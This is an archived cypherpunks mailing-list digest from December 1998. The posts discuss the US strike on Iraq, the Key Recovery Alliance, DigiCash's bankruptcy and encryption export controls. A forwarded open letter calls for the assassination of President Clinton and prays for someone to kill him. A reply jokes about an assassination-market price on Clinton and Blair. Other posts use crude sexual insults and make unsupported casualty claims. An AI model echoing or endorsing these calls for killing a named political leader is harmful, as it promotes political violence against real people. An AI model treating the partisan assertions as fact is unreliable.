To: cypherpunks@cyberpass.net
Subject: Clinton Attacks Iraq
Message-ID: <199812162220.QAA11058@wire.insync.net>
MIME-Version: 1.0
Content-Type: text/plain



Looks like Bubba has launched a massive strike on Iraq to draw attention
from his cocksucking problems.

-- 
Eric Michael Cordian 0+
O:.T:.O:. Mathematical Munitions Division
"Do What Thou Wilt Shall Be The Whole Of The Law"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Shrinidhi <nidhi@icope.com>
Date: Wed, 16 Dec 1998 22:33:35 +0800
To: "'cypherpunks@sirius.infonex.com>
Subject: FW: Information about Algorithmic hash
Message-ID: <01BE2910.D19808D0@DOORS>
MIME-Version: 1.0
Content-Type: text/plain




Hi all,

Can any one tell where can I find info about Algorithmic hash






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Thu, 17 Dec 1998 01:31:11 +0800
To: mib <mib@io.com>
Subject: Re: I must admit. . .
Message-ID: <19981216163705.5509.rocketmail@send106.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

hahahaha. . .now that was good.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBNnfhbVMQ9C083U98EQL7/ACaAlm+meYQpigAcpd2b60nTM48nT4AnjV+
bcnaWyFIx+QMFOvAEvoSi6B7
=LMpF
-----END PGP SIGNATURE-----





---mib <mib@io.com> wrote:
>
> On Wed, Dec 16, 1998 at 02:42:44PM +0000, Joel O'Connor wrote:
> > Cypherpunks write code?  Make people use it. . .
> 
> Vee have vays...
> 
> - d.
> 

==
"Be sand in the gears of the machine." Henry David Thoreau
            


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joel O'Connor" <ogrenivek@yahoo.com>
Date: Thu, 17 Dec 1998 02:09:37 +0800
To: Rabid Wombat <wombat@mcfeely.bsfs.org>
Subject: Re: I must admit. . .
Message-ID: <19981216164043.5754.rocketmail@send103.yahoomail.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

It only took one to turn India around.  Ghandi nearly starved to
death, used nothing but passifism and won the race man.  You can't
discredit the labors of a few, wonderous things can happen when 3
people bond together for a common cause.  To much negativity in this
world already, I don't wish to add to it.  We've got nothing left but
hope and what a large flame a small spark can ignite.

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.0.2

iQA/AwUBNnfiP1MQ9C083U98EQJ8tACg7OHwYApyS5ZV910pjal4l10a66cAoLT3
0MMHXv2SVi4gvLgd/VhGSVV8
=cZCk
-----END PGP SIGNATURE-----




---Rabid Wombat <wombat@mcfeely.bsfs.org> wrote:
>
> 
> 
> On Mon, 14 Dec 1998, Joel O'Connor wrote:
> 
> > -----BEGIN PGP SIGNED MESSAGE-----
> > Hash: SHA1
> > 
> > I wonder sometimes whether or not there is hope for us to ever stop
> > this tyrrany.  I've seen a bunch of us diss the strike saying it was
> > an outlandish and foolish idea, but I hadn't seen anyone of you come
> > up with something better.  That act of protest, no matter how small,
> > serves to raise awareness.
> 
> Nothing like an extremely weak protest effort to hurt the cause ...
> 
> Having three geeks unplug their computers for a day sends the message 
> that "nobody cares."
> 
> 
> 

==
"Be sand in the gears of the machine." Henry David Thoreau
            


_________________________________________________________
DO YOU YAHOO!?
Get your free @yahoo.com address at http://mail.yahoo.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Missouri FreeNet Administration <measl@mfn.org>
Date: Thu, 17 Dec 1998 07:41:40 +0800
To: gen-dist@mfn.org
Subject: Open Letter To William Klinton (fwd)
Message-ID: <Pine.BSF.3.96.981216163614.1753C-100000@support.noc.mfn.org>
MIME-Version: 1.0
Content-Type: text/plain



---------- Forwarded message ----------
Date: Wed, 16 Dec 1998 16:30:55 -0600 (CST)

Dear Mr. Klinton,

	Your actions in bombing Bagdad, *solely* to distract from your own
impeachment problems, is a Stalin-like crime against humanity.  I am
*astounded* that you are willing to throw away the lives of innocent
people in your attempt to hold your [so often abused] power. 

	Impeachment is no longer enough: only assasination could hope to
bring Justice to the world at this point.

	I fervently pray that some heroic man or woman will have the
courage and moral standing to answer the call and end your miserable Nazi
existence, and once again allow us to hold our heads up when announcing
that we are an American citizen.  Right now, I am totally ashamed: of you,
of the Country for allowing you to get to this point, of the system of
putrid politicians that allows you to stay in an office which allows you
to maim and murder in such a wanton and capricious manner.  In short, I am
ashamed of my citizenship. 


Yours, 
J.A. Terranson
sysadmin@mfn.org

--
If Governments really want us to behave like civilized human beings, they
should give serious consideration towards setting a better example:
Ruling by force, rather than consensus; the unrestrained application of
unjust laws (which the victim-populations were never allowed input on in
the first place); the State policy of justice only for the rich and 
elected; the intentional abuse and occassionally destruction of entire
populations merely to distract an already apathetic and numb electorate...
This type of demogoguery must surely wipe out the fascist United States
as surely as it wiped out the fascist Union of Soviet Socialist Republics.

The views expressed here are mine, and NOT those of my employers,
associates, or others.  Besides, if it *were* the opinion of all of
those people, I doubt there would be a problem to bitch about in the
first place...
--------------------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mib <mib@io.com>
Date: Thu, 17 Dec 1998 07:43:07 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Nitwits
In-Reply-To: <199810231545.RAA01452@replay.com>
Message-ID: <19981216165235.B6577@io.com>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, Dec 16, 1998 at 12:43:07PM -0800, Tim May wrote:
> I wanted to see what other nonsense this nitwit has written, and found this:
>
> At 10:12 AM -0800 10/23/98, Kevlar wrote:
> >My bad. You were serious. But still...
>
> My bad _what_? The fragment "My bad" is nonsense.

His homies in da hood are down wit it.

- d.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: real@freenet.edmonton.ab.ca
Date: Thu, 17 Dec 1998 10:03:12 +0800
To: measl@mfn.org>
Subject: Re: Open Letter To William Klinton (fwd)
In-Reply-To: <Pine.BSF.3.96.981216163614.1753C-100000@support.noc.mfn.org>
Message-ID: <199812170058.RAA31040@freenet.edmonton.ab.ca>
MIME-Version: 1.0
Content-Type: text/plain



Date sent:      	Wed, 16 Dec 1998 16:41:39 -0600 (CST)
From:           	Missouri FreeNet Administration <measl@mfn.org>
To:             	gen-dist@mfn.org
Copies to:      	cypherpunks@toad.com
Subject:        	Open Letter To William Klinton (fwd)
Send reply to:  	Missouri FreeNet Administration <measl@mfn.org>

> ---------- Forwarded message ----------
> Date: Wed, 16 Dec 1998 16:30:55 -0600 (CST)
> 

 The season has just openend on Klinton and Blair,what is the 
going price quoted on the AP bot on Blacknet?

> Dear Mr. Klinton,
> 
> 	Your actions in bombing Bagdad, *solely* to distract from your own
> impeachment problems, is a Stalin-like crime against humanity.  I am
> *astounded* that you are willing to throw away the lives of innocent
> people in your attempt to hold your [so often abused] power. 
> 
> 	Impeachment is no longer enough: only assasination could hope to
> bring Justice to the world at this point.
> 
> 	I fervently pray that some heroic man or woman will have the
> courage and moral standing to answer the call and end your miserable Nazi
> existence, and once again allow us to hold our heads up when announcing
> that we are an American citizen.  Right now, I am totally ashamed: of you,
> of the Country for allowing you to get to this point, of the system of
> putrid politicians that allows you to stay in an office which allows you
> to maim and murder in such a wanton and capricious manner.  In short, I am
> ashamed of my citizenship. 
> 
> 
> Yours, 
> J.A. Terranson
> sysadmin@mfn.org
> 
> --
> If Governments really want us to behave like civilized human beings, they
> should give serious consideration towards setting a better example:
> Ruling by force, rather than consensus; the unrestrained application of
> unjust laws (which the victim-populations were never allowed input on in
> the first place); the State policy of justice only for the rich and 
> elected; the intentional abuse and occassionally destruction of entire
> populations merely to distract an already apathetic and numb electorate...
> This type of demogoguery must surely wipe out the fascist United States
> as surely as it wiped out the fascist Union of Soviet Socialist Republics.
> 
> The views expressed here are mine, and NOT those of my employers,
> associates, or others.  Besides, if it *were* the opinion of all of
> those people, I doubt there would be a problem to bitch about in the
> first place...
> --------------------------------------------------------------------
> 
> 


                   Graham-John Bullers
     edmc.net           ab756@freenet.toronto.on.ca
              moderator of alt.2600.moderated
    http://www.freenet.edmonton.ab.ca/~real/index.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Dec 1998 02:16:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: CRYPTO-GRAM, December 15, 1998
Message-ID: <199812161730.SAA23119@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> Okay, I finally got the story right about Network Associates Inc. and the
> Key Recovery Alliance.  (Last month I pointed to a Wired News story that
> they quietly rejoined.)  The story is wrong.  They never left the KRA.
> Since its inception, Trusted Information Systems was a big mover and shaker
> in the KRA.  When NAI bought TIS in May 1998, TIS's membership transferred
> to NAI.  NAI resigned the leadership posts that TIS had held in the
> Alliance and stopped attending its meetings, but never left the KRA.  So,
> NAI is a member of the KRA, and has been since it bought TIS.
> http://www.wired.com/news/print_version/technology/story/16219.html

As a further clarification, it is incorrect to say that NAI "never left
the KRA."

Network Associates Inc. (NAI) was formed out of McAfee and Network
General.  McAfee was a member of the KRA, so at the time NAI was formed,
it was a member of the KRA.

When NAI bought PGP, in late 1997, Phil Zimmermann found out about NAI's
membership, and he was able to persuade management to withdraw from
the KRA.  This is why it is wrong to say that NAI never left the KRA.
See http://www.news.com/News/Item/0,4,17112,00.html.

NAI bought TIS a few months later.  TIS was a member and in fact a leading
member of the KRA.  By purchasing TIS, NAI inherited its membership in
the KRA, and so NAI was once again a member.

It's not clear whether Phil Zimmermann or anyone else tried to get NAI to
again withdraw from the KRA, but if they did, they were not successful.
NAI renewed its membership later in 1998 and is still a member of the KRA,
although it has reduced its level of participation.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes - Denver <jim.burnes@ssds.com>
Date: Thu, 17 Dec 1998 10:30:55 +0800
To: Eric Cordian <emc@wire.insync.net>
Subject: Re: Clinton Attacks Iraq
In-Reply-To: <199812162220.QAA11058@wire.insync.net>
Message-ID: <Pine.SOL.3.91.981216182518.23805A-100000@denver>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 16 Dec 1998, Eric Cordian wrote:

> Date: Wed, 16 Dec 1998 16:20:09 -0600 (CST)
> From: Eric Cordian <emc@wire.insync.net>
> To: cypherpunks@cyberpass.net
> Subject: Clinton Attacks Iraq
> 
> Looks like Bubba has launched a massive strike on Iraq to draw attention
> from his cocksucking problems.
> 

10K civvies are predicted to expire for this little excercise.  The 
republicans in grand style stopped the impeachment vote obediently.

Whats your definition of evil?

This is totally out of control.  As much as I dislike the UN, Klinton
is supposed to get agreement with the UN security council.

This amount to a war crime under UN law and maybe that matters to
senate democrats.

This definitely seals the "abuse of power" charges.

Murdering 10k civvies to avoid impeachment just verifies everything
I believed about this guy.


jim




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Dec 1998 09:09:42 +0800
To: dbs@philodox.com>
Subject: Re: DigiCash Update, part II
In-Reply-To: <v04020a21b29d677d3898@[139.167.130.248]>
Message-ID: <v04020a2eb29dc7d8dfef@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

At 2:55 PM -0500 on 12/16/98, Tim May wrote:

> The bankruptcy laws simply don't work this way. At least not in the U.S.

Actually, Tim, they do. And, frankly, what an amazingly silly thing to say.


A day doesn't go by when debt-holders don't convert to common, or are asked
to do so, bankruptcy or not, and take over what's left of a corporation
like DigiCash. Frequently, debtholders are the people in the strongest
position to do so, and the trustee agrees. Almost all bank mergers happen
that way, for instance, and a patent's as good an asset as a bank deposit,
especially if it's earning revenue, like DigiCash's are, however small that
revenue might be.

Actually auctioning off a company's assets doesn't happen nearly much as
the Small Business Adminstration -- or whoever your sources are -- say they
do. Mergers are usually the rule. Look at PGP, if you want a pointer.
Cybercash will probably be sold, someday, debts and all, and probably for
the amount of their debt, which, by now, I bet, is as considerable as
DigiCash's.

So, indeed, if partners of the caliber Lucky is boasting he has went out
and bought up the debt of DigiCash, it would take about a heartbeat and a
half before Loftesness, or even the bankruptcy trustee, would offer them
stock, if not control, just to take the company out of Chapter 11. Or, more
likely, to merge it with a more solvent business.

To think otherwise, is, frankly, a complete betrayal of your cluelessness on
the subject, Tim, and I don't use that word lightly in your regard.

> If a company is ultimately liquidated the physical plant, furnishing,
> equipment, bank accounts (if any), patents, and (sometimes) "good will" are
> sold. Proceeds then go to the various debt holders according to their class
> of debt.

Right. If it gets that far. Usually, it doesn't. In the case of DigiCash, it
might, except for one rather obvious thing. They still have outstanding
revenue from the likes of DeutcheBank, Nomura, and a few other rather large
financial institutions. That means that the patents, at the very least, are
worth something on the books, and probably *won't* be sold at auction
unless everything else fails. Frankly, converting all the outstanding debt
to common would be the cheapest thing to do, and you could bet that if
Loftesness could do it, he would.

Finally, if all that doesn't work, there's still the possibility of buying
the patents at graveside, like you, and, frankly, I, were talking about,
but, given the capital market's thorough disfavor for internet transaction
protocols these days, the patents are probably not worth much to any of the
"players" Lucky says he has, especially in the modern world of hockey-stick
internet IPO's and VC-induced investment bubbles.

So, outside of their residual remaining royalties :-), the patents *might*
be worth something to some financial crypto labs, and to the internet
crypto community at large, but that's about it, which was why I'm trying to
put together a syndicate to backstop whatever Loftesness tries to do to get
DigiCash back on it's feet.

To be blunt, nobody has *proven* that they're worth anything else but
research curiosity, so far. And, until the debts on DigiCash are taken off
the books (by stock-for-debt swap, or outright buyout, or whatever), we're
not going to find out anytime soon.

> The debt holders _may_ have side deals, contractually arranged, which give
> them rights of first refusal on certain patents or assets. But not usually.

More properly, DigiCash's debts may, in fact, *be* secured by the patents
themselves. In which case, the debtholders *do* get the patents.  Given the
quality of the outstanding debtholders, (most of whom *are* VC folks, if I
remember what I've heard) I expect that if it were at all possible to
collateralize the debt with the patents, they would have done so.

Of course, we'll find out the real answers to all of this when the Chapter 11
filing is actually final. Right now, I hear that there's nothing there but
a placeholder filing, with no actual assets listed in detail, much less
whether they're secured by anything.

> So, buying the debt of a company facing liquidation guarantees almost
> nothing about gaining access to patents.

Nonsense. Utter, complete, absolute -- and, clueless -- nonsense. See above.

> Someone who has no debt interest
> in the company may well end up outbidding others for assets, including
> patents.

Sure. Except, of course, when the judge turns the debtholders into
controlling shareholders instead. Go read up on a few actual bankruptcy
cases, Tim. It might help you state your case better if you used actual
data.

> This is just basic business stuff. I'm an investor in

<and so forth...>

Yes, I know, Tim. You "know" <drop a name here>, and *I'm* no <dropped name
here>, and so on, and yes, we all know, you're a tycoon of massive renown.
A giant unsold position in Intel, which you have now retired early on, to a
fortress out in the thules somewhere, proves you must be such.


Of course, Tim, if you really were clueful about business as you say you
are (instead of just a commendably frugal case of being exactly the right
employee at the right time), *and* you cared about making blind signatures
ubiquitous, you, the man who taught us all how important they were to begin
with, could have probably *bought* the patent yourself, probably for a
song, at least once when they were up for grabs in the last few years. And
you might even made money on them, being so clueful in business, of course.
:-/.

I even expect that you could even buy those pantents now, all by yourself,
if you could remove yourself from your Barcolounger, except for the odd
trip to the shooting range, to buy a new stereo, or to wait for the
millenium. Yelling insults at the local gendarmarie as they drive by your
Y2K-proof stone-by-stone replica of Wolf's Lair, challenging them to come
and shoot you out, copper, doesn't exactly help, either, I suppose.

If you thought financial privacy was so important, you, personally, Tim,
could have done something about this, a long time ago. All by yourself,
without anyone else. And you didn't. Instead, you snipe.

Oh, well. Cypherpunks now ride Barcoloungers, I suppose.


Frankly -- if I may step aside the point of the thread, here -- since you
started this chicken-little, off-the-pig, shoot-the-"criminals",
Junior-Birdman militia kick, you're just plain boring, Tim. Tireder than
Wired, you are.

Which is a real drag to lots of folks who are still here, because you
really had a lot to say once. You taught everyone here most of the way they
think about the world, in fact. Double that for all the people who've left
the list already in the wake of your recent thermite infatuation.

Nowadays, though, I remember a very sad, but funny, Firesign Theater
takeoff on 'Desiderata' which seems to sum you up pretty well. It said
something like '...you're a fluke of the Universe, and, while you're
sitting there, looking stupid, the Universe is laughing behind your back'.

That is, you pop off with the occasional "kill the bastards", or the
occasional "pearl" of business wisdom like the above, and we'd laugh,
except that you're no funnier than any other incontinent old gentleman,
yelling at the local skatepunks trashing his flowerbeds. Or minefields. Or
whatever.

> About the wisdom of announcing a takeover publically I'll say nothing.

That's nice. Glad to hear such a well-founded opinion.

Except, of course, that that's the way it's usually done, Tim.  People
raise their money, they get their partners signed up into a legal
arrangement of some kind, they hoist the Jolly Roger if necessary, and they
make a tender offer. In public. No veiled intimations of a "Secret Santa",
somewhere in the wings, come to save the day.

Transactions, for the most part, are based on reputation, or have you
forgotten that as well?


And, yes, Tim, I actually do know how it's done. I've seen it. I've been
right there, albiet with an extremely junior clerk's-eye view, and almost
two decades of hindsight. :-). Certainly, close enough to know when someone
isn't blowing smoke, which is what I'm increasingly convinced I see, here,
so far.

And, sadly, what's really more important here, is that I now know you
*haven't* seen this kind of thing done, Tim, and you don't know any more
about what you've been saying about mergers, or bankruptcy, than what
you've read in the papers. If you read the papers at all anymore, that is.


So, to return to the point, here, if anyone's going to make a run at
DigiCash, they should do something, or, to fracture some scatology, get off
the pot. They should not go stomping around public mailing lists saying the
equivalent of, "I have secret partners and we have secret plans, and we're
going to free the blind signature patent for all to use".

So, please, give me a break. About the "secret santa" bit, anyway. It would
be very nice indeed to pry the blind signature patent out from the beached,
debt-ridden carcass that DigiCash has now become, :-), and I think that
it's going to happen sooner or later.

Whether a bunch of cypherpunks, with or without Timothy C. May, will ride
up in a cloud of dust and save the day remains, of course, to be seen.
Frankly, I'd rather expect that the financial crypto community will step up
to the plate, here, but we'll see.


And, so, with the above, -- and now final, as far as I'm concerned -- pile
of, well, clueless dreck, from you, Tim, I've reached an amazing decision.

Something I never thought would happen, even with all the excrement you've
heaped in my, and other people's, general direction over the years. To
paraphrase the joke about the optimist child at the Christmas tree, there
was usually a pony in mess somewhere.

But, with this, it has finally happened, Tim.

Welcome to *my* killfile.


Given the quality of your contributions to this cypherpunks lately, I
expect that I won't miss you very much, and that is a very sorry shame indeed.


Cheers,
Robert Hettinga

-----BEGIN PGP SIGNATURE-----
Version: PGP for Personal Privacy 5.5.5

iQEVAwUBNnhNrcUCGwxmWcHhAQEqygf/a6Ml50SqXJHfWxWrHFI4AfzSleL7bGzZ
laKlUP3sl7HcDz43D58gMZmFJblYO/1cucj4VoK8SL1+EqiqE/3DH3G4yCSAbaFO
YaaJ3W9V1xVdxoSk9alWPN0kQfLdSJeF+CZsGqCorhhDXIAqm6X4z86B7IZLDltG
KaY3ENxomCE64fM6PZRBplz4dRW14K8OrxbshPoR07Lg4sjMCG8hUzHHq2uq+VcL
CrPWtrHYynWSCZagKUHZeWekm1QxheZssYcTG4kar7NHq76wooLexWkmC8lGhDpu
gVDL1wtnzlqBkDKa22M6x98sHBOwC56gfkeExPwGaRFHqcU6fUYPuw==
=6xeW
-----END PGP SIGNATURE-----
-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frederick Burroughs <riburr@shentel.net>
Date: Thu, 17 Dec 1998 10:52:17 +0800
To: Cypherpunks <cypherpunks@ns.minder.net>
Subject: Re: Clinton Attacks Iraq
In-Reply-To: <199812162220.QAA11058@wire.insync.net>
Message-ID: <367868B6.5146E3@shentel.net>
MIME-Version: 1.0
Content-Type: text/plain





Eric Cordian wrote:

> Looks like Bubba has launched a massive strike on Iraq to draw attention
> from his cocksucking problems.

No, I blame his irritability on lack of nookie. Unable to get his his willy
slick of late, it's not surprising he needs to kick the dog, or lob some
ordinance into the backyard of the middle eastern assholes nextdoor. Maybe
if he gets drunk enough he'll take some pot shots... Yeehaa!

Bush had an overactive thyroid (fighting wars from speedboats), Clinton had
an overactive, but recently unrequited cock (fighting wars from the woodshed
while being impeached). The truth is this is a war that must be fought no
matter what clown is in the White House.

The hard fact is Iraq is of the utmost geopolitical importance, it's on the
agenda, and to hell with fellatio inspired impeachment. In a word,
everything's come to a head. Saddam's a target, his demonization by the
western press has been thorough. This is a test of our resources to target
one man, a superpower against one man, there is no God. Gunboat diplomacy my
good man, gunboat diplomacy.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 17 Dec 1998 12:05:24 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Potential Crypto Development Sites (re: Stallman)
Message-ID: <199812170324.VAA15307@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 16 Dec 1998 21:52:00 -0500
> From: Robert Hettinga <rah@shipwright.com>
> Subject: Richard Stallman: Encryption software volunteers needed in
>  countries without export control

> List of countries signing the Wassenaar agreement:
> 
> Argentina, Australia, Austria, Belgium, Bulgaria, Canada, Czech Republic,
> Denmark, Finland, France, Germany, Greece, Hungary, Ireland, Italy,
> Japan, Republic of Korea, Luxembourg, Netherland, New Zealand, Norway,
> Poland, Portugal, Romania, Russia, Slovakia, Spain, Sweden, Switzerland,
> Turkey, Ukraine, United Kingdom and United States.
> 
> --- end forwarded text

Belize isn't on the list and it's only 2 hours from Houston. Citizenship can
be had for as little as $40k US. They market themselves as a tax haven.
Apparently anyone living there for 5 years can qualify for citizenship.


    ____________________________________________________________________

          What raises the standard of living may well diminish the
          quality of life.

                                                 The Club of Rome

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Thu, 17 Dec 1998 11:55:05 +0800
To: cypherpunks@cyberpass.net
Subject: Richard Stallman: Encryption software volunteers needed incountries without export control
Message-ID: <v04020a35b29e224c23ab@[139.167.130.248]>
MIME-Version: 1.0
Content-Type: text/plain




--- begin forwarded text


To: cryptography@c2.net
Subject: Richard Stallman: Encryption software volunteers needed in
countries without export control
Date: Wed, 16 Dec 1998 19:35:07 -0500
From: "Perry E. Metzger" <perry@jekyll.piermont.com>
Sender: owner-cryptography@c2.net



Date: Tue, 8 Dec 1998 03:40:23 -0700 (MST)
Message-Id: <gnusenet199812081040.DAA29657@wijiji.santafe.edu>
From: Richard Stallman <rms@gnu.org>
To: info-gnu@gnu.org
Subject: Encryption software volunteers needed in countries without export
control

[Please re-post this as widely as possible, wherever appropriate]

The US has scored a major victory in the global campaign against
freedom and privacy rights, by persuading 33 major countries to
prohibit export of free encryption software.  These countries are the
ones that are party to the Wassenaar agreement (see list below).

The agreement is not final; putting it into effect would require new
laws or regulations in each country, and in some countries it might be
possible to organize politically to block this.  If you are a citizen
of a country listed below, please talk with your legislators and urge
them to refuse to ratify the agreement.  See www.epic.org for more
information.

However, anticipating the possibility that these laws will go through,
we need to find volunteers in countries which are not signatories to
take over development and distribution of encryption software such as
the GNU Privacy Guard and PSST.  We are looking for (1) an ftp site
from which to distribute the software, and (2) people to carry on
the development work.

If you have contacts in any non-signatory country, please circulate
this message as widely as possible in your country, looking for people
who might want to volunteer for GNU software development.
Non-signatory countries that come to mind as possible places where
free encryption software can be developed include Mexico, India,
Croatia, China, South Africa, and perhaps Israel.  However, any
country is ok if its laws do not prevent the work.

Big Brother has won a battle, but the war is not over.


List of countries signing the Wassenaar agreement:

Argentina, Australia, Austria, Belgium, Bulgaria, Canada, Czech Republic,
Denmark, Finland, France, Germany, Greece, Hungary, Ireland, Italy,
Japan, Republic of Korea, Luxembourg, Netherland, New Zealand, Norway,
Poland, Portugal, Romania, Russia, Slovakia, Spain, Sweden, Switzerland,
Turkey, Ukraine, United Kingdom and United States.

--- end forwarded text


-----------------
Robert A. Hettinga <mailto: rah@philodox.com>
Philodox Financial Technology Evangelism <http://www.philodox.com/>
44 Farquhar Street, Boston, MA 02131 USA
"... however it may deserve respect for its usefulness and antiquity,
[predicting the end of the world] has not been found agreeable to
experience." -- Edward Gibbon, 'Decline and Fall of the Roman Empire'




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Dec 1998 05:48:02 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Network Associates' KRA Partner status
Message-ID: <199812162102.WAA09792@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Jim Gillogly writes:

>I remember hearing this at the time.  The cited article (8 Dec 1997) has
>supporting quotes from NAI's Gene Hodges.  In addition, Dave Del Torto
>wrote to the secretary of KRA last month and got a response from
>secretariat staffer Michael LoBue on 20 Nov 1998 that addresses this
>point in passing:
>
>    Indeed, some of this current 'public debate' about NAI's
>    relationship with the KRA goes back to their public statement
>    that they 'withdrew' from the organization. The fact of the matter
>    is that they simply did not choose to become an actual member at the
>    time the organization was formally constituted. When it was reported
>    that they withdrew, there was in fact no entity from which to withdraw.

This sounds like some legalistic spin-doctoring from the KRA to try to
minimize the political impact of the departure.  Are they really claiming
that the KRA did not exist as late as December, 1997?  See their own press
release at http://www.kra.org/clips/alliance2.html, dated October 2,
1996, describing the formation of the KRA.  See also the McAfee press
release at http://www.nai.com/about/news/press/1996/121296.asp, dated
December 12, 1996, saying that McAfee was joining the KRA, and the KRA
press release http://www.kra.org/clips/prkeyrec0597.html from May, 1997,
welcoming 22 new members.

Perhaps their story is that prior to December, 1997, the KRA had enough
existence for companies to join, but not enough for them to withdraw?

>> NAI bought TIS a few months later.  TIS was a member and in fact a leading
>> member of the KRA.  By purchasing TIS, NAI inherited its membership in
>> the KRA, and so NAI was once again a member.
>
>It was more explicit than this.  Michael LoBue said further:
>
>    Concerning Network Associates membership in the KRA, in response to your
>    question I have verified that our files contain an executed Membership
>    Agreement for Network Associates (dated July 2, 1998), as well as a properly
>    completed Application for Membership of that same date. 
>
>This is not just accepting the existing membership status of TIS.  It's
>reversing NAI's non-membership status and explicitly joining.

Keep in mind that the KRA is apparently trying to put a particular spin
on events, as is clear from their strained attempt to claim that NAI never
withdrew because their was "no entity from which to withdraw."  They want
to maximize the appearance of commercial support for their organization.

The membership applications they are referring to may just be the
paperwork needed to officially transfer the membership from TIS to NAI.
This would represent NAI's decision to continue to be a member of the
KRA but would not be a matter of joining anew; rather it would maintain
the existing relationship inherited from TIS.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Thu, 17 Dec 1998 08:21:33 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: Clinton Attacks Iraq
Message-ID: <199812162343.AAA25819@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



> -----Original Message-----
> From: Eric Cordian [mailto:emc@wire.insync.net]
> Sent: Wednesday, December 16, 1998 4:20 PM
> To: cypherpunks@cyberpass.net
> Subject: Clinton Attacks Iraq
>
> Looks like Bubba has launched a massive strike on Iraq to 
> draw attention
> from his cocksucking problems.

Spoken like a poet.  First thought, best thought.

Here's a loose haiku:

Bubba launched
a massive strike on Iraq
blowjob snag go *poof*

Excuse the abuse of style...

C.G.

--
sig space for lease




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 17 Dec 1998 08:41:42 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: RE: Nitwits
Message-ID: <bac16d2953fa55fc89c5bbb344d4792e@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



>The depressing thing is that AOL as at least 14 million paying subscribers.
>It may even be up to 20 million. Hotmail has 30 million active accounts. The
>unilluminati are the future of the internet.
>
>Harv

Sites like AOL and Hotmail do a great service to the net: They hurd the
unilluminati onto a select few sites, making it easier to blackhole them en
masse.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Thu, 17 Dec 1998 15:32:37 +0800
To: Anonymous <nobody@replay.com>
Subject: RE: Clinton Attacks Iraq
In-Reply-To: <199812162343.AAA25819@replay.com>
Message-ID: <Pine.BSF.3.91.981217015757.5726B-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain



Was it my imagination, or did the T'Hawk strikes pause for Bubba's speech?
It seemed like they were coming into Baghdad every half hour, like
clockwork, but they seem to have skipped one half-hour's worth when Bubba
was on the air. 

-r.w.

On Thu, 17 Dec 1998, Anonymous wrote:

> > -----Original Message-----
> > From: Eric Cordian [mailto:emc@wire.insync.net]
> > Sent: Wednesday, December 16, 1998 4:20 PM
> > To: cypherpunks@cyberpass.net
> > Subject: Clinton Attacks Iraq
> >
> > Looks like Bubba has launched a massive strike on Iraq to 
> > draw attention
> > from his cocksucking problems.
> 
> Spoken like a poet.  First thought, best thought.
> 
> Here's a loose haiku:
> 
> Bubba launched
> a massive strike on Iraq
> blowjob snag go *poof*
> 
> Excuse the abuse of style...
> 
> C.G.
> 
> --
> sig space for lease
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: HyperReal-Anon <nobody@sind.hyperreal.art.pl>
Date: Thu, 17 Dec 1998 10:11:27 +0800
